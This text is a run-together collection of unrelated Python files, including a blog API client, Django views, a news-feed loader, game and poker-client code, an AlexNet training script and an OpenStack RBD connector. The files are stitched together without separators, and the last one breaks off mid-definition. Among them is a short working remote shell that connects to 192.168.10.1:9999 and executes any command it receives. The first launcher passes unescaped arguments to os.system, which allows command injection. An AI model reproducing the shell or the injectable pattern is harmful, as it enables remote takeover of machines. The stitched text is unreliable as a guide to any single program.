#!/usr/bin/env python3 # pylint: disable=C0114 import os import sys try: # pylint: disable=W0632 proxy, token, roomName = sys.argv[1:] except ValueError: print('Command arguments: {} <user> <password> <proxy>'.format( os.path.basename(sys.argv[0])) ) sys.exit(1) _COMMAND_ = './ClientServer.py "%(proxy)s" %(token)s r "%(nombre_mapa)s" ' final_command = _COMMAND_ % { 'nombre_mapa': roomName, 'proxy': proxy, 'token': token } os.system(final_command)
#!/usr/bin/python #coding=utf-8 class CookieStoreBase: def getCookie(self, url): raise NotImplementedError def setCookie(self, url, cookie): raise NotImplementedError
import requests

# Base address of the blog REST API (module-level fallback, kept for
# backward compatibility with code importing `url` from this module).
url = 'https://mars.se-pro.site'


class Blogger:
    """Client-side mirror of a blogger resource behind the /bloggers/ API.

    Instantiating the class immediately POSTs a new blogger to the server
    and caches the returned ``id``/``full_name`` on the instance.
    """

    url = 'https://mars.se-pro.site'

    def __init__(self, full_name):
        """Create the blogger remotely and cache its server-side state."""
        payload = {'full_name': full_name}
        response = requests.post(f'{self.url}/bloggers/', data=payload)
        blogger = response.json()
        self.id = blogger['id']
        self.full_name = blogger['full_name']

    def delete(self, id=None):
        """DELETE this blogger, or the one with the explicitly given *id*.

        (*id* shadows the builtin; the parameter name is kept so existing
        keyword callers ``delete(id=...)`` keep working.)
        """
        requests.delete(f'{self.url}/bloggers/{id or self.id}/')

    def update(self, full_name):
        """PUT a new full name and refresh the cached state."""
        payload = {'full_name': full_name}
        response = requests.put(f'{self.url}/bloggers/{self.id}/', data=payload)
        blogger = response.json()
        self.id = blogger['id']
        self.full_name = blogger['full_name']

    @classmethod
    def all(cls):
        """Print every blogger known to the server (debugging helper)."""
        response = requests.get(f'{cls.url}/bloggers/')
        bloggers = response.json()
        print(bloggers)
        for blogger in bloggers:
            print('blogger = ', blogger['full_name'])

    def __str__(self):
        return f"Id: {self.id} Name: {self.full_name} "


if __name__ == '__main__':
    # Smoke test: create a blogger, then rename it. Guarded so importing
    # this module no longer fires network requests as a side effect.
    eyyub = Blogger('Eyyub Amiraslanov')
    print(eyyub)
    eyyub.update('Kenan Semenderli')
    print(eyyub)
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect
from django.core.urlresolvers import reverse
from PIL import Image

from aesthetic_computation.models import Post, Category


# custom error handlers
def handler404(request, *args, **argv):
    """Render the custom 404 page."""
    return render(request, 'ac/404.html', {})


def handler500(request, *args, **argv):
    """Render the custom 500 page."""
    return render(request, 'ac/500.html', {})


# home page (and category listing page)
def home(request, category_name=None):
    """List all posts (newest first), optionally filtered to one category.

    An unknown category name redirects back to the unfiltered home page.
    """
    posts = Post.objects.all()
    if category_name is not None:
        try:
            cat = Category.objects.get(name=category_name)
            posts = cat.post_set.all()
        except Exception:
            # category does not exist, redirect to home
            # (was a bare except:; narrowed to Exception so Ctrl-C and
            # SystemExit are no longer swallowed)
            return HttpResponseRedirect(reverse('home'))
    # posts are stored oldest-first; reverse for display
    context = {'posts': posts[::-1]}
    return render(request, 'ac/index.html', context)


# single post page
def post(request, id):
    """Render a single post with prev/next navigation and layout hints."""
    try:
        post = Post.objects.get(id=id)
        cats = post.categories.all()
    except Exception:
        # post does not exist (or bad id), redirect to home
        return HttpResponseRedirect(reverse('home'))

    # get previous and next posts for arrow links
    try:
        prev_post_id = Post.objects.get(id=int(id) - 1).id
    except Exception:
        prev_post_id = None
    try:
        next_post_id = Post.objects.get(id=int(id) + 1).id
    except Exception:
        next_post_id = None

    # check if image is sufficiently large that we can allow a big view
    wide_entry = ''
    # BUG FIX: width was only assigned inside the try block, so a failed
    # Image.open made the `context` line below raise NameError.
    width = None
    try:
        with Image.open(post.image_large) as img:
            width, height = img.size
        if width >= 1400:
            wide_entry = ' wide-entry'
        if width >= 1700:
            wide_entry += ' wide-entry-xl'
        if width >= 2300:
            wide_entry += ' wide-entry-xxl'
    except Exception:
        # image missing/unreadable: fall back to the narrow layout
        pass

    context = {'post': post, 'cats': cats, 'wide_entry': wide_entry,
               'width': width,
               'prev_post_id': prev_post_id, 'next_post_id': next_post_id}
    return render(request, 'ac/post.html', context)


# arxiv functionality
def arxiv(request, date=None):
    """Browse scraped arXiv images by date.

    Two galleries are served: the daily image scrape (arxiv/) and the ITA
    gallery (arxivpubs/); a *date* present in either selects its images.
    """
    from .settings import MEDIA_ROOT, MEDIA_URL
    import os
    import glob

    baseurl = MEDIA_URL.replace("projects/", "arxiv/")

    # get list of directories (daily image scrape)
    dirs = glob.glob(MEDIA_ROOT + "../arxiv/*")
    dirs.sort(key=os.path.getmtime)
    dirs = [dir.rsplit("/")[-1] for dir in dirs]

    # get list of directories (ITA gallery)
    dirs2 = glob.glob(MEDIA_ROOT + "../arxivpubs/*")
    dirs2.sort(key=os.path.getmtime)
    dirs2 = [dir.rsplit("/")[-1] for dir in dirs2 if '.txt' not in dir]

    # if a date is specified, get the list of all its filenames too
    images = []
    if date is not None and date in dirs + dirs2:
        images = glob.glob(MEDIA_ROOT + "../arxiv/%s/*" % date)
        if len(images) == 0:
            # hack to detect an arxivpubs/ request
            images = glob.glob(MEDIA_ROOT + "../arxivpubs/%s/*" % date)
            baseurl = MEDIA_URL.replace("projects/", "arxivpubs/")
        images = [image.rsplit("/")[-1] for image in images]
        images.sort()
        # list of (image filename, arxiv ID) tuples
        images = [[image, image.split("_")[0]] for image in images]

    context = {'dirs': dirs, 'date': date, 'images': images,
               'baseurl': baseurl,  # daily image scrape
               'dirs2': dirs2}  # ITA gallery
    return render(request, 'ac/arxiv.html', context)


# aas job map
def aasjobmap(request):
    """Render the static AAS job map page."""
    context = {}
    return render(request, 'ac/aasjobmap.html', context)
from sqlalchemy import create_engine, MetaData, Table, Integer, String, Column, DateTime, ForeignKey, \
    Text, insert, select, func
from sqlalchemy.exc import SQLAlchemyError
from datetime import datetime
from itertools import chain
from multiprocessing import Pool
import logging

import parsers
import config

metadata = MetaData()
engine = create_engine(config.db_connection_string)
db_news = engine.connect()
logging.basicConfig(filename=config.filename_log, level=logging.INFO)

# Registered news sources.
sources = Table('sources', metadata,
                Column('id', Integer(), primary_key=True),
                Column('name', String(100), nullable=False),
                Column('url', String(100), unique=True),
                Column('logo', Text, nullable=False)
                )

# Feed URLs to parse, one or more per source.
source_urls = Table('source_urls', metadata,
                    Column('id', Integer(), primary_key=True),
                    Column('source_id', Integer(), ForeignKey('sources.id')),
                    Column('url', Text, nullable=False)
                    )

# Downloaded news items; 'link' is unique and used for deduplication.
news = Table('news', metadata,
             Column('id', Integer(), primary_key=True),
             Column('source_id', Integer(), ForeignKey('sources.id')),
             Column('title', Text, nullable=False),
             Column('description', Text, nullable=False),
             Column('datetime', DateTime(), nullable=False),
             Column('link', String(768), unique=True),
             Column('media', Text),
             Column('tags', Text, nullable=False)
             )


# Compare the list of resources in the database (tables "sources" and
# "source_urls") and in the parser module (parsers.py). Add new resources
# to the database.
def check_resource_list():
    """Insert any parser-declared source missing from the database."""
    list_url_sources = [i[0] for i in db_news.execute(select([sources.c.url])).fetchall()]
    for resource in parsers.list_sources:
        try:
            if resource['url'] not in list_url_sources:
                db_news.execute(insert(sources), name=resource['name'],
                                url=resource['url'], logo=resource['logo'])
                for link in resource['links_of_parse']:
                    db_news.execute(insert(source_urls),
                                    source_id=get_source_id(resource['url']),
                                    url=link)
        except SQLAlchemyError:
            logging.exception(f'Error adding source to database: {resource}')


# Getting id from table "sources" by url value
def get_source_id(url):
    """Return the id of the source with the given *url* (None on error)."""
    try:
        # Select the id column explicitly; the original selected the whole
        # row and relied on scalar() incidentally returning the first
        # column, which only worked because 'id' happened to be first.
        sel = select([sources.c.id]).where(sources.c.url == url)
        return db_news.execute(sel).scalar()
    except SQLAlchemyError:
        logging.exception(f'Error getting the source ID. Link: {url}')


# Loading a list of fresh news from a source
def download_news(data_source):
    """Parse one source and return its fresh, batch-deduplicated news dicts.

    Each kept item is enriched with 'source_id' and passed through the
    source-specific checking function before being returned.
    """
    result = []
    func_parser = data_source['func_parser']
    func_checking_news = data_source['func_checking']
    urls_source = data_source['links_of_parse']
    list_news = func_parser(*urls_source)
    if source_id := get_source_id(data_source['url']):
        seen_links = []  # links already accepted in this batch
        for news_ in list_news:
            if is_fresh_news(news_) and news_['link'] not in seen_links:
                seen_links.append(news_['link'])
                news_['source_id'] = source_id
                result.append(func_checking_news(news_))
    return result


# Checking the presence of this news in the database
def is_fresh_news(this_news):
    """Return True when the item's link is not yet stored in "news"."""
    try:
        sel = select([news.c.link]).where(news.c.link == this_news['link'])
        result = db_news.execute(sel).scalar()
        return not result
    except SQLAlchemyError:
        logging.exception(f'Error checking the presence of this news in the database: {this_news["link"]}')
        # Treat a failed check as "not fresh" so we never insert duplicates.
        return False


def add_news_to_database(n_list):
    """Insert each news dict individually, logging (not raising) failures."""
    for news_ in n_list:
        try:
            db_news.execute(insert(news), news_)
        except SQLAlchemyError:
            logging.exception(f'Error adding news to database: {news_}')


def get_count_news():
    """Return the total number of rows in the "news" table."""
    sel = select([func.count()]).select_from(news)
    return db_news.execute(sel).scalar()


if __name__ == "__main__":
    metadata.create_all(engine)
    logging.info(f' Time: {datetime.now()}. Start loading news.')
    check_resource_list()
    count_news = get_count_news()
    # Download from all sources in parallel, then flatten and sort by time.
    pool = Pool(processes=8)
    news_list = pool.map(download_news, parsers.list_sources)
    news_list = list(chain(*news_list))
    news_list.sort(key=lambda x: x['datetime'])
    add_news_to_database(news_list)
    logging.info(f' Time: {datetime.now()}. Stop loading news. Added news to DB: {get_count_news() - count_news}')
class Greeter: def __init__(self): pass def speak(self, name): print("Hello", name)
from Dishes import * class Plate(Dishes): def __init__(self, dishesType, material, diameter, dishName): self.dishesType = dishesType self.material = material self.diameter = diameter self.dishName = dishName
from enemyshooter import EnemyShooter
from enemybullet import EnemyBullet


class ShooterFleet():
    """A fleet of shooting enemies plus the bullets they have fired.

    NOTE(review): get_initial_ships builds a single shooter (both loops run
    range(1)) even though row_count/column_count are accepted -- confirm
    whether a full row_count x column_count grid was intended.
    """

    def __init__(self, row_count, column_count, initial_speed, enemy_img,
                 starting_xcor, starting_ycor):
        self.direction = 0.5  # sign/step of horizontal travel
        self.speed = initial_speed
        self.ships = self.get_initial_ships(row_count, column_count, enemy_img,
                                            starting_xcor, starting_ycor)
        self.enemybullets_fired = []
        self.width = enemy_img.get_width()
        self.height = enemy_img.get_height()

    def get_initial_ships(self, row_count, column_count, enemy_img,
                          starting_xcor, starting_ycor):
        """Create the initial shooters; remembers the last position used.

        (Two unreachable `return self.xcor` / `return self.ycor` statements
        that followed the real return were removed.)
        """
        initial_ships = []
        for row in range(1):
            for col in range(1):
                current_xcor = starting_xcor + col * enemy_img.get_width()
                current_ycor = starting_ycor + row * enemy_img.get_height()
                initial_ships.append(EnemyShooter(enemy_img, current_xcor,
                                                  current_ycor))
                self.xcor = current_xcor
                self.ycor = current_ycor
        return initial_ships

    def enemyshoot(self, enemybullet_image):
        """Fire a bullet horizontally centred on the fleet's position."""
        new_enemybullet = EnemyBullet(
            enemybullet_image,
            self.xcor + self.width / 2 - enemybullet_image.get_width() / 2,
            self.ycor)
        self.enemybullets_fired.append(new_enemybullet)

    def change_direction(self):
        """Reverse horizontal movement. (Was defined twice; kept once.)"""
        self.direction *= -1

    def move_over(self):
        """Advance every ship horizontally by direction * speed. (De-duplicated.)"""
        for ship in self.ships:
            ship.move_over(self.direction * self.speed)

    def handle_wall_collision_for_enemybullets(self, bottom_wall):
        """Kill bullets that hit the bottom wall, then purge them.

        BUG FIX: the loop bound `bullet` but the body referenced an
        undefined `enemybullet`, raising NameError on every call with a
        non-empty bullet list.
        """
        for bullet in self.enemybullets_fired:
            if bullet.has_collided_with_bottom_wall(bottom_wall):
                bullet.is_alive = False
        self.remove_dead_enemybullets()

    def remove_dead_enemybullets(self):
        """Drop dead bullets; iterate backwards so pops don't skip items."""
        for i in range(len(self.enemybullets_fired) - 1, -1, -1):
            if self.enemybullets_fired[i].is_alive == False:
                self.enemybullets_fired.pop(i)

    def move_all_enemybullets(self):
        for enemybullet in self.enemybullets_fired:
            enemybullet.move()

    def show_all_enemybullets(self, game_display):
        for enemybullet in self.enemybullets_fired:
            enemybullet.show(game_display)

    def show(self, game_display):
        for ship in self.ships:
            ship.show(game_display)

    def handle_wall_collision(self, left_wall, right_wall):
        """Bounce the fleet off the side walls.

        NOTE(review): self.move_down() is not defined anywhere in this
        class -- presumably expected from elsewhere; confirm before use.
        """
        for ship in self.ships:
            if ship.has_collided_with_left_wall(left_wall) or \
                    ship.has_collided_with_right_wall(right_wall):
                self.move_down()
                self.change_direction()
                break

    def remove_dead_ships(self):
        """Drop dead ships; iterate backwards so pops don't skip items."""
        for i in range(len(self.ships) - 1, -1, -1):
            if self.ships[i].is_alive == False:
                self.ships.pop(i)
import sys
import zmq
import json
import uuid


class Server:
    """Wrapper around the ZMQ sockets used to talk to the game server.

    A REQ socket carries request/reply commands; a SUB socket receives
    table broadcasts.
    """

    def __init__(self, usr):
        self.usr = usr
        self.table = ''
        ### ZMQ Initialization ###
        ctx = zmq.Context()
        # SUB socket for published table events; initially subscribed to all.
        self.pubsrv = ctx.socket(zmq.SUB)
        self.pubsrv.connect('tcp://127.0.0.1:5556')
        self.pubsrv.setsockopt_string(zmq.SUBSCRIBE, '')
        # REQ socket for synchronous commands.
        self.srv = ctx.socket(zmq.REQ)
        self.srv.connect("tcp://127.0.0.1:5555")

    def list_table(self):
        """Ask the server for the list of open tables (JSON list or ERROR)."""
        self.srv.send_string("LIST")
        return self.srv.recv_string()

    def create_table(self, name):
        """Request creation of a table called *name*."""
        self.srv.send_string("TABLE %s"%(name))
        return self.srv.recv_string()

    def join_table(self, name):
        """Request to seat the current user at table *name*."""
        self.srv.send_string("JOIN %s %s"%(self.usr, name))
        return self.srv.recv_string()

    def get_hand(self):
        """Fetch this user's current hand (JSON-encoded)."""
        self.srv.send_string("GETHAND %s"%(self.usr))
        return self.srv.recv_string()

    def get_turn(self):
        """Fetch whose turn it is at the current table."""
        self.srv.send_string("GETTURN %s"%(self.table))
        return self.srv.recv_string()

    def resubscribe(self, table):
        """Re-point the SUB socket at *table*'s topic only."""
        self.pubsrv.setsockopt_string(zmq.UNSUBSCRIBE, '')
        self.pubsrv.setsockopt_string(zmq.SUBSCRIBE, table)

    def hunt_table(self):
        """Join the first joinable table, or create a new one.

        Returns True once seated, False if table creation failed.
        """
        while not self.table:
            msg = self.list_table()
            if msg.startswith('ERROR'):
                msg = '[]'
            tables = json.loads(msg)
            while tables:
                tmp = tables.pop()
                self.resubscribe(tmp)
                msg = self.join_table(tmp)
                if not msg.startswith('ERROR'):
                    self.table = tmp
                    return True
            # No joinable table: create one with a random unique name and
            # loop back to try joining it.
            msg = self.create_table(str(uuid.uuid4()))
            if msg.startswith('ERROR'):
                self.resubscribe('')
                return False

    def poll_sub(self, handler):
        """Drain pending published messages, passing each payload to *handler*.

        Messages look like "<topic> <payload>"; the topic is stripped.
        """
        while(self.pubsrv.poll(1)):
            _, _, data = (self.pubsrv.recv_string()).partition(' ')
            handler(data)


class Game:
    """ Keeps track of game information """

    def __init__(self, server):
        self.money = 0        # chips held by this player
        self.hand = []        # current hand as decoded from the server
        self.players = []     # seat order of all players at the table
        self.round = 0
        self.turn = 0         # index into self.players
        self.table = []
        self.blind = 0
        self.is_over = False
        # Map message names to H_<NAME> handler methods (prefix stripped).
        self.handlers = {k[len('H_'):]:v for k, v in Game.__dict__.items()
                         if k.startswith('H_')}
        self.server = server

    def handle_msg(self, content):
        """ Invokes the handler for the message received """
        print("Handling ", content)
        content = content.split(' ')
        # Unknown message names fall through to a no-op that just reports.
        cmd = self.handlers.get(content[0], lambda *args: print("Invalid message"))
        cmd(self, *content[1:])

    def H_START(self, start_money, blind_val, *players):
        """ Handles the start of a new game """
        self.money = int(start_money)
        self.blind = int(blind_val)
        self.players = list(players)

    def H_STARTHAND(self, start_player):
        """ Handles the start of a new hand """
        self.turn = self.players.index(start_player)
        self.hand = json.loads(self.server.get_hand())

    def H_BLIND(self, player, value):
        """ Handles the blind bets """
        # Only our own blind affects our stack.
        if player == self.server.usr:
            self.money -= int(value)

    def H_TURN(self, player, *actions):
        """ Handles the Turn information """
        if player == self.server.usr:
            pass #TODO Take some action

    def H_GAMEOVER(self):
        """ Handles the end of the game """
        self.is_over = True


if __name__ == "__main__":
    usr = ''
    if len(sys.argv) > 1:
        usr = sys.argv[1]
    srv = Server(usr)
    srv.hunt_table()
    game = Game(srv)
    # Pump published table events into the game until it ends.
    while not game.is_over:
        srv.poll_sub(game.handle_msg)
import pickle
import tensorflow as tf
from sklearn.model_selection import train_test_split
# from sklearn.cross_validation import train_test_split
from alexnet import AlexNet
import numpy as np
from sklearn.utils import shuffle
import time

# TODO: Load traffic signs data.
with open("train.p", mode='rb') as f:
    train = pickle.load(f)

# TODO: Split data into training and validation sets.
features = train['features']
labels = train['labels']
X_train, X_val, y_train, y_val = train_test_split(features, labels, test_size = 0.33, random_state = 2016)

graph = tf.Graph()
with graph.as_default():
    # TODO: Define placeholders and resize operation.
    # 32x32 RGB traffic-sign images are upscaled to AlexNet's 227x227 input.
    x = tf.placeholder(tf.float32, (None, 32, 32, 3))
    y = tf.placeholder(tf.int32, None)
    resized = tf.image.resize_images(x, [227,227])

    # TODO: pass placeholder as first argument to `AlexNet`.
    # By keeping `feature_extract` set to `True`
    # we indicate to NOT keep the 1000 class final layer
    # originally used to train on ImageNet.
    fc7 = AlexNet(resized, feature_extract=True)
    # NOTE: `tf.stop_gradient` prevents the gradient from flowing backwards
    # past this point, keeping the weights before and up to `fc7` frozen.
    # This also makes training faster, less work to do!
    fc7 = tf.stop_gradient(fc7)

    # TODO: Add the final layer for traffic sign classification.
    nb_classes = 43
    # New FC layer: He-style init (stddev = sqrt(2/fan_in)), zero bias.
    shape = (fc7.get_shape().as_list()[-1], nb_classes)
    w_tz = tf.Variable(tf.truncated_normal(shape=shape, stddev=tf.sqrt(2.0/shape[0])))
    b_tz = tf.zeros(shape[1])
    logits = tf.nn.xw_plus_b(fc7, w_tz, b_tz)

    # TODO: Define loss, training, accuracy operations.
    # HINT: Look back at your traffic signs project solution, you may
    # be able to reuse some the code.
    # NOTE(review): positional (logits, y) args were removed in later TF 1.x;
    # newer versions require labels=..., logits=... keywords -- confirm the
    # TF version in use.
    loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(logits, y))
    optimizer = tf.train.AdamOptimizer().minimize(loss)
    train_prediction = tf.nn.softmax(logits)

# TODO: Train and evaluate the feature extraction model.
acc_val = []
loss_val = []
with tf.Session(graph=graph) as sess:
    init = tf.global_variables_initializer()
    sess.run(init)
    nb_epochs = 1
    batch_size = 32

    def accuracy(pred, labels):
        # Fraction of rows whose argmax matches the integer label.
        return (np.sum(np.equal(np.argmax(pred, 1),labels)))/pred.shape[0]

    for epoch in range(nb_epochs):
        t0 = time.time()
        # NOTE(review): np.int is removed in NumPy >= 1.24; plain int()
        # would be needed there -- confirm the NumPy version in use.
        total_batch = np.int(X_train.shape[0]/batch_size)
        X_train, y_train = shuffle(X_train, y_train)
        for i in range(total_batch):
            offset = i * batch_size
            # Training images are scaled to [0, 1] here...
            batch_x = X_train[offset:(offset+batch_size), ]/255.0
            batch_y = y_train[offset:(offset+batch_size)]
            sess.run([optimizer, train_prediction], feed_dict={x: batch_x, y: batch_y})
        # Validate in fixed chunks of 57 samples.
        for k in range(0, X_val.shape[0], 57):
            # ...but NOTE(review): validation batches are NOT divided by
            # 255 like training batches -- confirm whether that mismatch
            # is intended (it likely depresses validation accuracy).
            l, p = sess.run([loss, train_prediction], feed_dict={x: X_val[k:(k+57), ], y: y_val[k:(k+57)]})
            acc_val.append(accuracy(p, y_val[k:(k+57)]))
            loss_val.append(l)
        print("Epoch {}: ".format(epoch))
        print("Time spend: {}".format(time.time()-t0))
        print("Validation Loss: {}".format(np.mean(loss_val)))
        print("Validation Accuracy: {:.3%}".format(np.mean(acc_val)))

"""
(As a point of reference one epoch over the training set
takes roughly 53-55 seconds with a GTX 970.)
Epoch 0:
Time spend: 932.5579879283905
Validation Loss: 16.838653564453125
Validation Accuracy: 21.470%
"""
def main(): import matplotlib.pyplot as plt import numpy as np with open('avg1.list') as avg1_list: avg1 = avg1_list.read() avg1 = avg1.split() avg1 = [float(item) for item in avg1] seconds = np.arange(5, avg1.__len__() * 10 + 5, 10) fig, ax = plt.subplots() plt.plot(seconds, avg1) ax.set_xlabel('время от начала дня (сек)') ax.set_ylabel('Load Average 1') plt.show() with open('ram.list') as ram_list: ram = ram_list.read() ram = ram.split() ram = [float(item) for item in ram] seconds = np.arange(5, ram.__len__() * 10 + 5, 10) fig, ax = plt.subplots() plt.plot(seconds, ram) ax.set_xlabel('время от начала дня (сек)') ax.set_ylabel('free RAM') plt.show() if __name__ == "__main__": main()
# Copyright (c) 2018, Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Helper code to attach/detach out of OpenStack

OS-Brick is meant to be used within OpenStack, which means that there are
some issues when using it on non OpenStack systems.

Here we take care of:

- Making sure we can work without privsep and using sudo directly
- Replacing an unlink privsep method that would run python code privileged
- Local attachment of RBD volumes using librados

Some of these changes may be later moved to OS-Brick. For now we just copied
it from the nos-brick repository.
"""
import errno
import functools
import os

from os_brick import exception
from os_brick.initiator import connector
from os_brick.initiator import connectors
from os_brick.privileged import rootwrap
from oslo_concurrency import processutils as putils
from oslo_privsep import priv_context
from oslo_utils import fileutils
from oslo_utils import strutils
import six


class RBDConnector(connectors.rbd.RBDConnector):
    """Connector class to attach/detach RBD volumes locally.

    OS-Brick's implementation covers only 2 cases:

    - Local attachment on controller node.
    - Returning a file object on non controller nodes.

    We need a third one, local attachment on non controller node.
    """

    def connect_volume(self, connection_properties):
        """Map an RBD volume locally and return its block-device path.

        Returns a dict with 'path' (the mapped device), 'conf' (the generated
        ceph conf file that disconnect_volume must clean up) and 'type'.
        """
        # NOTE(e0ne): sanity check if ceph-common is installed.
        self._setup_rbd_class()

        # Extract connection parameters and generate config file
        # NOTE(review): a missing dict key raises KeyError and a name without
        # '/' raises ValueError — neither is caught by `except IndexError`
        # below, so malformed properties may escape as the raw exception.
        try:
            user = connection_properties['auth_username']
            pool, volume = connection_properties['name'].split('/')
            cluster_name = connection_properties.get('cluster_name')
            monitor_ips = connection_properties.get('hosts')
            monitor_ports = connection_properties.get('ports')
            keyring = connection_properties.get('keyring')
        except IndexError:
            msg = 'Malformed connection properties'
            raise exception.BrickException(msg)

        conf = self._create_ceph_conf(monitor_ips, monitor_ports,
                                      str(cluster_name), user, keyring)

        link_name = self.get_rbd_device_name(pool, volume)
        real_path = os.path.realpath(link_name)

        try:
            # Map RBD volume if it's not already mapped
            if not os.path.islink(link_name) or not os.path.exists(real_path):
                cmd = ['rbd', 'map', volume, '--pool', pool, '--conf', conf]
                cmd += self._get_rbd_args(connection_properties)
                stdout, stderr = self._execute(*cmd,
                                               root_helper=self._root_helper,
                                               run_as_root=True)
                real_path = stdout.strip()
                # The host may not have RBD installed, and therefore won't
                # create the symlinks, ensure they exist
                if self.containerized:
                    self._ensure_link(real_path, link_name)
        except Exception:
            # Don't leak the generated ceph conf file on failure.
            fileutils.delete_if_exists(conf)
            raise

        return {'path': real_path,
                'conf': conf,
                'type': 'block'}

    def _ensure_link(self, source, link_name):
        """Create (or repair) the /dev/rbd-style symlink to the mapped device."""
        self._ensure_dir(os.path.dirname(link_name))
        if self.im_root:
            try:
                os.symlink(source, link_name)
            except OSError as exc:
                if exc.errno != errno.EEXIST:
                    raise
                # If we have a leftover link, clean it up
                if source != os.path.realpath(link_name):
                    os.remove(link_name)
                    os.symlink(source, link_name)
        else:
            # Not root: create the link through sudo; -f overwrites leftovers.
            self._execute('ln', '-s', '-f', source, link_name,
                          run_as_root=True)

    def check_valid_device(self, path, run_as_root=True):
        """Verify an existing RBD handle is connected and valid."""
        if self.im_root:
            # Root can probe the device directly with a short read.
            try:
                with open(path, 'r') as f:
                    f.read(4096)
            except Exception:
                return False
            return True

        try:
            # Non-root: probe via dd under sudo instead of opening directly.
            self._execute('dd', 'if=' + path, 'of=/dev/null', 'bs=4096',
                          'count=1', root_helper=self._root_helper,
                          run_as_root=True)
        except putils.ProcessExecutionError:
            return False
        return True

    def disconnect_volume(self, connection_properties, device_info,
                          force=False, ignore_errors=False):
        """Unmap the RBD volume and remove the conf file created on connect."""
        self._setup_rbd_class()
        pool, volume = connection_properties['name'].split('/')
        conf_file = device_info['conf']
        link_name = self.get_rbd_device_name(pool, volume)
        real_dev_path = os.path.realpath(link_name)

        if os.path.exists(real_dev_path):
            cmd = ['rbd', 'unmap', real_dev_path, '--conf', conf_file]
            cmd += self._get_rbd_args(connection_properties)
            self._execute(*cmd, root_helper=self._root_helper,
                          run_as_root=True)

            if self.containerized:
                unlink_root(link_name)
        fileutils.delete_if_exists(conf_file)

    def _ensure_dir(self, path):
        """mkdir -p with 0755, directly when root or through sudo otherwise."""
        if self.im_root:
            try:
                os.makedirs(path, 0o755)
            except OSError as exc:
                if exc.errno != errno.EEXIST:
                    raise
        else:
            self._execute('mkdir', '-p', '-m0755', path, run_as_root=True)

    def _setup_class(self):
        """One-time class setup: verify ceph-common and detect environment."""
        try:
            self._execute('which', 'rbd')
        except putils.ProcessExecutionError:
            msg = 'ceph-common package not installed'
            raise exception.BrickException(msg)

        RBDConnector.im_root = os.getuid() == 0
        # Check if we are running containerized
        # NOTE(review): st_dev > 4 is a heuristic for an overlay/container
        # filesystem — confirm it holds on the target deployments.
        RBDConnector.containerized = os.stat('/proc').st_dev > 4
        # Don't check again to speed things on following connections
        RBDConnector._setup_rbd_class = lambda *args: None

    # First call runs the full setup; it then replaces itself with a no-op.
    _setup_rbd_class = _setup_class


ROOT_HELPER = 'sudo'


def unlink_root(*links, **kwargs):
    """Unlink files as root, without running privileged Python code.

    Keyword args: no_errors suppresses failures entirely; raise_at_end
    collects failures into an ExceptionChainer raised after all attempts.
    """
    no_errors = kwargs.get('no_errors', False)
    raise_at_end = kwargs.get('raise_at_end', False)
    exc = exception.ExceptionChainer()
    catch_exception = no_errors or raise_at_end
    error_msg = 'Some unlinks failed for %s'
    if os.getuid() == 0:
        for link in links:
            with exc.context(catch_exception, error_msg, links):
                os.unlink(link)
    else:
        # Non-root: one rm invocation through sudo for all links.
        with exc.context(catch_exception, error_msg, links):
            putils.execute('rm', *links, run_as_root=True,
                           root_helper=ROOT_HELPER)

    if not no_errors and raise_at_end and exc:
        raise exc


def _execute(*cmd, **kwargs):
    """Run a command via rootwrap, converting OSError into
    ProcessExecutionError with a password-masked command line."""
    try:
        return rootwrap.custom_execute(*cmd, **kwargs)
    except OSError as e:
        sanitized_cmd = strutils.mask_password(' '.join(cmd))
        raise putils.ProcessExecutionError(
            cmd=sanitized_cmd, description=six.text_type(e))


def init(root_helper='sudo'):
    """Monkey-patch OS-Brick so it works outside OpenStack.

    Replaces the connector-properties getter and connector factory with
    wrappers that force our root helper / executor, substitutes our
    RBDConnector for the 'rbd' protocol, and swaps the privsep unlink
    for the sudo-based one above.
    """
    global ROOT_HELPER
    ROOT_HELPER = root_helper
    priv_context.init(root_helper=[root_helper])

    existing_bgcp = connector.get_connector_properties
    existing_bcp = connector.InitiatorConnector.factory

    def my_bgcp(*args, **kwargs):
        if len(args):
            args = list(args)
            args[0] = ROOT_HELPER
        else:
            kwargs['root_helper'] = ROOT_HELPER
        kwargs['execute'] = _execute
        return existing_bgcp(*args, **kwargs)

    def my_bgc(protocol, *args, **kwargs):
        if len(args):
            # args is a tuple and we cannot do assignments
            args = list(args)
            args[0] = ROOT_HELPER
        else:
            kwargs['root_helper'] = ROOT_HELPER
        kwargs['execute'] = _execute

        # OS-Brick's implementation for RBD is not good enough for us
        if protocol == 'rbd':
            factory = RBDConnector
        else:
            factory = functools.partial(existing_bcp, protocol)

        return factory(*args, **kwargs)

    connector.get_connector_properties = my_bgcp
    connector.InitiatorConnector.factory = staticmethod(my_bgc)
    if hasattr(rootwrap, 'unlink_root'):
        rootwrap.unlink_root = unlink_root
import socket import sys import os host = '192.168.10.1' port = 9999 ADDR = (host, port) def create(): global session session = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def connect(): try: session.connect(ADDR) print("[+]Connection is build up") except: print("[-]Can not connect to host") def listen(): while True: command = session.recv(1024) final = command.decode() try: turn = os.popen(final).read() session.send(turn.encode()) except: session.send(("[-]Command has not been done!").encode()) def main(): create() connect() listen() main()
#TO RUN: joey2 project_operation_tests.py
import sys
import os
import unittest
import shutil
sys.path.append('../')
import lib.config as config
import lib.mm_util as util
import test_helper as helper
from lib.mm_connection import MavensMatePluginConnection
from lib.mm_client import MavensMateClient


class TestProjectOperations(unittest.TestCase):
    """Integration tests for MavensMate project operations against a live
    Salesforce developer org (Python 2 code: note the `print` statements).
    Each test creates a fresh project in the workspace via setUp's cleanup.
    """

    # Class-level switch: the org-wide metadata cleanup in setUp runs only
    # once per test run (setUp flips it off afterwards).
    RunInitialDelete = True

    # FYI: overriding this constructor is apparently not recommended, so we should find a better way to init test data
    def __init__(self, *args, **kwargs):
        super(TestProjectOperations, self).__init__(*args, **kwargs)
        # Credentials/settings for the developer org under test.
        self.project_name = 'MavensMateUnitTestProject'
        self.username = 'mm@force.com'
        self.password = 'force'
        self.org_type = 'developer'

    def setUp(self):
